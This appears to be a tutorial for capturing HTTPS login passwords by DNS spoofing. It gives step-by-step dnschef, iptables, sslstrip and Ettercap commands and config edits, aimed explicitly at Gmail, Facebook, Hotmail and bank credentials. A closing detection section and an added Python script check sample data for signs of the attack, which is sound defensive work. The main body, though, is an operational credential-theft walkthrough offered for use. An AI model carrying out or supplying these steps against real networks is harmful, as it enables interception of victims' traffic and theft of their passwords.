Capture passwords on HTTPS (SSL) using DNS spoofing

Greetings everyone

From the title you can pretty much guess what this tutorial is all about, so let's go ahead and dive in :)
First you need a tool called "Dnschef". Download it from: https://thesprawl.org/media/projects/dnschef-0.2.1.tar.gz
Of course we also need Dsniff, Ettercap and sslstrip; I suggest you use a pentest distro of your choice rather than installing sniffing/spoofing tools on your own.

root@ubuntu:~# cd dnschef-0.2.1
root@ubuntu:~/dnschef-0.2.1# ./dnschef.py
          _                _          __
         | | version 0.2  | |        / _|
      __| |_ __  ___  ___| |__   ___| |_
     / _` | '_ \/ __|/ __| '_ \ / _ \  _|
    | (_| | | | \__ \ (__| | | |  __/ |
     \__,_|_| |_|___/\___|_| |_|\___|_|
                   iphelix@thesprawl.org

  • DNSChef started on interface: 127.0.0.1
  • Using the following nameservers: 8.8.8.8
  • No parameters were specified. Running in full proxy mode

Introduction

In this tutorial we will carry out a Man-in-the-Middle (MITM) attack using DNS spoofing (impersonating the DNS service) and capture SSL traffic, and with it the passwords of sites like Gmail, Facebook, Hotmail and banks.
Attack

To do this you need to modify the victim's DNS settings.
First prepare the DNS service that will do the impersonation. For this we use DNSChef, which redirects the resolution of some domain names to a specific IP.

python dnschef.py --interface=192.168.1.7 --fakeip=192.168.1.7

--interface: the IP of the interface that will listen for DNS requests; this is the address that was previously configured as the DNS server on the victim's computer.

--fakeip: the IP that dnschef returns as the resolution of every domain. If the victim is remote, enter the attacker's public IP address.

--truedomains: domains that resolve to their real IP (try it without this option first to see that it works).

While we watch the network traffic, the redirected client traffic continues on its normal course, so the victim does not notice any malfunction of the connection.

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

In the case of a remote attack it is also necessary to forward ports 53 (DNS) and 80 (HTTP) on our router to the attacking machine.

To finish preparing the attacking machine, the SSL traffic (here we focus on HTTPS) must travel in clear text between the attacker and the victim and encrypted between the attacker and the legitimate server. We do this with SSLStrip and its -a option (all types of traffic).

./sslstrip.py

Now all that is left is to start capturing traffic and passwords. For this we use Ettercap, because it gives a very clear view of the captured username and password. Unfortunately we need to change Ettercap's default settings; to do this, edit the file /usr/local/etc/etter.conf and make the following changes:

Modify the ec_uid and ec_gid settings:

[privs]
ec_uid = 0        # ec_uid = 65534   # nobody is the default
ec_gid = 0        # ec_gid = 65534   # nobody is the default

And uncomment the lines that correspond to the use of iptables:

#####################################
# redir_command_on/off
#####################################
# you must provide a valid script for your operating system in order to have
# the SSL dissection available
# note that the cleanup script is executed without enough privileges (because
# they are dropped on startup). so you have to either: provide a setuid program
# or set the ec_uid to 0, in order to be sure the cleanup script will be
# executed properly
# NOTE: this script is executed with an execve(), so you can't use pipes or
# output redirection as if you were in a shell. We suggest you to make a script if
# you need those commands.

#---------------
# Linux
#---------------

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Run Ettercap so that the packets appear only in text mode (-T), quietly without packet headers (-q), on the chosen interface, for example eth0 (-i):

ettercap -T -q -i <your interface>

With any luck, within a few minutes passwords will start scrolling on the screen. If you need to stop the attack while it is running, it is quite convenient to redirect Ettercap's output to a file.
Detection

This type of attack can only be detected by the following methods:

The site is not using HTTPS: in the URL you can see whether the site is using the https encryption protocol. This is possibly the easiest way to detect the attack.
Anomalous domain-to-IP resolution: if we see, for example with the ping command, that the DNS server resolves a name to an IP that is not the normal one, or even to one that lies within our internal network.
Changed network settings: finally, by checking the DNS settings we can detect a change of this parameter to a value that does not fit within the structure of our network.
With traceroute we would see an extra hop through the attacking host.
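The three symptoms above (a login page served over plain http, unrelated names all resolving to one address inside the LAN, and a resolver that is not one of ours) can be checked from the victim side with a small script. The following is an added example and is not part of the original tutorial or of the dnschef, sslstrip or Ettercap projects. The resolv.conf text, the DNS answers and the HTML page are constructed samples (192.168.1.7 is the attacker address used in the tutorial), and the approved-resolver list, the internal network ranges and the internal domain suffixes are assumed site policy that you would replace with your own.

```python
"""Added example (not the tutorial's code): host-side checks for the three
detection symptoms described in the post. Every input is a constructed sample
so the script runs offline; in real use you would read the live resolv.conf,
the answers your resolver actually returns, and the page your browser got."""
import ipaddress
import re
from collections import Counter
from urllib.parse import urljoin, urlparse

# Constructed sample: resolv.conf after the DNS server was switched to a LAN host.
SAMPLE_RESOLV_CONF = """\
# Generated by NetworkManager
search example.lan
nameserver 192.168.1.7
"""

# Constructed sample of answers seen on the victim. dnschef in full-proxy mode
# hands out its --fakeip for every name, so unrelated public names collapse to one IP.
SAMPLE_ANSWERS = {
    "mail.google.com": "192.168.1.7",
    "www.facebook.com": "192.168.1.7",
    "login.live.com": "192.168.1.7",
    "intranet.example.lan": "192.168.1.20",
}

# Constructed sample of a login page whose https links were rewritten to http.
SAMPLE_PAGE_URL = "http://mail.google.com/login"
SAMPLE_PAGE_HTML = """
<html><body>
<form action="http://mail.google.com/auth" method="post">
  <input name="user"><input name="pass" type="password">
</form>
<a href="https://support.example.com/help">Help</a>
</body></html>
"""

# Assumed site policy (placeholders): the resolvers we hand out, our address space
# and the DNS suffixes that legitimately live inside it.
APPROVED_RESOLVERS = ["192.168.1.1", "10.0.0.53"]
INTERNAL_NETS = ["192.168.0.0/16", "10.0.0.0/8", "172.16.0.0/12"]
INTERNAL_SUFFIXES = (".lan", ".local")


def parse_nameservers(text):
    """Nameserver addresses from resolv.conf-style text (comments ignored)."""
    found = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = re.match(r"nameserver\s+(\S+)$", line)
        if m:
            found.append(m.group(1))
    return found


def unexpected_nameservers(servers, approved=APPROVED_RESOLVERS):
    """Symptom 3 (changed network settings): resolvers outside the approved list."""
    return [s for s in servers if s not in set(approved)]


def resolution_anomalies(answers, internal_nets=INTERNAL_NETS,
                         internal_suffixes=INTERNAL_SUFFIXES, min_shared=2):
    """Symptom 2 (anomalous resolution). Returns (external names that resolve
    into internal address space, answers shared by min_shared or more names)."""
    nets = [ipaddress.ip_network(n) for n in internal_nets]
    external_to_internal = sorted(
        name for name, ip in answers.items()
        if not name.endswith(internal_suffixes)
        and any(ipaddress.ip_address(ip) in net for net in nets))
    shared = {ip: n for ip, n in Counter(answers.values()).items() if n >= min_shared}
    return external_to_internal, shared


def insecure_form_actions(html, page_url):
    """Symptom 1 (site not using HTTPS): forms that would submit credentials
    over plain http, which is how a stripped login page looks to the browser."""
    actions = re.findall(r'<form[^>]*\baction="([^"]*)"', html, flags=re.IGNORECASE)
    return [urljoin(page_url, a) for a in actions
            if urlparse(urljoin(page_url, a)).scheme != "https"]


def audit(resolv_conf=SAMPLE_RESOLV_CONF, answers=SAMPLE_ANSWERS,
          html=SAMPLE_PAGE_HTML, page_url=SAMPLE_PAGE_URL):
    """Run all three checks and return the findings keyed by check name."""
    ext_internal, shared = resolution_anomalies(answers)
    return {
        "unexpected_nameservers": unexpected_nameservers(parse_nameservers(resolv_conf)),
        "external_names_resolving_internally": ext_internal,
        "shared_answers": shared,
        "insecure_form_actions": insecure_form_actions(html, page_url),
    }


if __name__ == "__main__":
    for check, hits in audit().items():
        print(f"{check}: {hits if hits else 'ok'}")
```

Each check is independent, so a single hit is only a hint; the combination (a LAN resolver you did not configure, several big public names sharing one LAN address, and a password form posting over http) is what the tutorial's setup produces, and that combination is worth an alert. The "shared answer" heuristic needs a handful of lookups to unrelated names, which is why the sample feeds it several domains rather than one.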

I hope you have enjoyed the tutorial.
